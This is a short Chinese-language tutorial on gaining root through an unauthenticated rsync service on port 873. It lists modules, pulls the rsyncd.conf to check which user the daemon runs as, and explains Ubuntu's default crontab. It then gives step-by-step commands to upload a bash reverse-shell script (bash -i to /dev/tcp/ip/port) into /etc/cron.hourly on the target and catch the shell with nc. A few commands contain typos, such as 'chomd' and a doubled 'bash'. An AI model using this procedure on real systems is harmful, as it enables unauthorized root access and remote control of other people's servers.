rsync提權

介紹：Rsync是linux下一款數據備份工具，默認開啓873端口

利用條件：rsync未受權

列出模板
rsync rsync://目標ip:873/

列出模塊src下的文件
rsync rsync://目標ip:873/

rsync下的配置文件/etc/rsynd.conf到本機的/root/1.conf
rsync -av rsync://目標ip:873/src/etc/rsyncd.conf /root/1.conf

ubuntu的定時任務默認文件：

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

17 * * * * root cd / && run-parts --report /etc/cron.hourly的意思是：每小時的第17分鐘執行run-parts --report /etc/cron.hourly命令

查看rsync下配置文件，是以什麼權限運行的：

rsync -av rsync://目標ip:873/src/etc/rsyncd.conf 1.conf

cat 1.conf

提權：

一、建立一個shell文件，內容爲bash bash -i >& /dev/tcp/ip/port 0>&1
二、賦予執行權限：chomd +x shell
三、上傳文件到定時任務目錄下rsync -av shell rsync://192.168.1.143:873/src/etc/cron.hourly
四、進行nc 監聽相應的端口